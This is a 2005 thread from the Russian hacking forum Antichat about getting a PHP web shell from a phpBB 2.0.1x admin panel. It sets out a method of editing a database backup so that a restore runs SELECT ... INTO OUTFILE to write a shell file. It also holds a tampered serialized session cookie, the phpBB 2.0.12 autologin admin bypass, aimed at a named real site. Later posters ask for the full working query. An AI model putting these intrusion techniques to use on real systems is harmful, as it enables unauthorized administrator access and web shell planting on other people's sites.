Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Можно ли получить php шелл из админки phpbb 2.0.1x? (https://forum.antichat.xyz/showthread.php?t=5329)

[TSH]Corpse 06.03.2005 13:14
Можно ли получить php шелл из админки phpbb 2.0.1x?
 
Можно ли получить php шелл из админки phpbb 2.0.1x?

KEZ 06.03.2005 13:22
Не из 2.0.1 не из 2.0.13 не из админки какого либо другого форума phpBB веб шелл получить нельзя.

Хотя у меня есть альтернативные варианты.
Известно что когда бы делаешь backup, скачивается файл, содержащий mysql-запросы, которые выполняются после восстановления.
Предположим что админ криво настроил с-му и у mysqld есть права на запись в какуюто папку))
Тогда мы бекапаем базу, потом редактируем чтобы выполнялся
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
пишем соответствующий пост, чтобы его текст оказался в файле. Потом восстанавливаем базу, и запрос
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
выполняется

3pricol3 06.03.2005 20:04
по поваду взлома Взлом phpBB 2.0.12

3pricol3 (15:31) :
# HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.

kartografs.net.ru FALSE / FALSE 1141647870 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2254%22%3B% 7D
это написано в куке мозилки переделываю на
3pricol3 (15:31) :
# HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.


kartografs.net.ru FALSE / FALSE 1141647870 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
и ничего не меняется
3pricol3 (15:31) :
почему я что то нетак делаю?
и я запуталась?

max_pain89 06.03.2005 22:14
Цитата:
Сообщение от 3pricol3
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2254%22%3B% 7D
phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
и ничего не меняется
3pricol3 (15:31) :
почему я что то нетак делаю?
и я запуталась?
Ты просто дурак

Mega_GnoM 07.03.2005 00:02
как узнать какая директория имеет право на запись ?
и вообще поподробнее как это реализовать ?

coyl 07.03.2005 03:26
Ты говорил про строку типа:
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
У меня такой вопрос - как грамотно прописать путь к папке, в которую идет запись, если я не знаю, где лежат файлы самого сайта, т.е. полный путь(типа home/.../www/forum) указать не могу

[Tsh] *CorPSe* 07.03.2005 04:03
Kez > Не мог бы написать полный запрос?
Я в мускулах 0 .. т.е учу но результаты мизерные.


Время: 22:18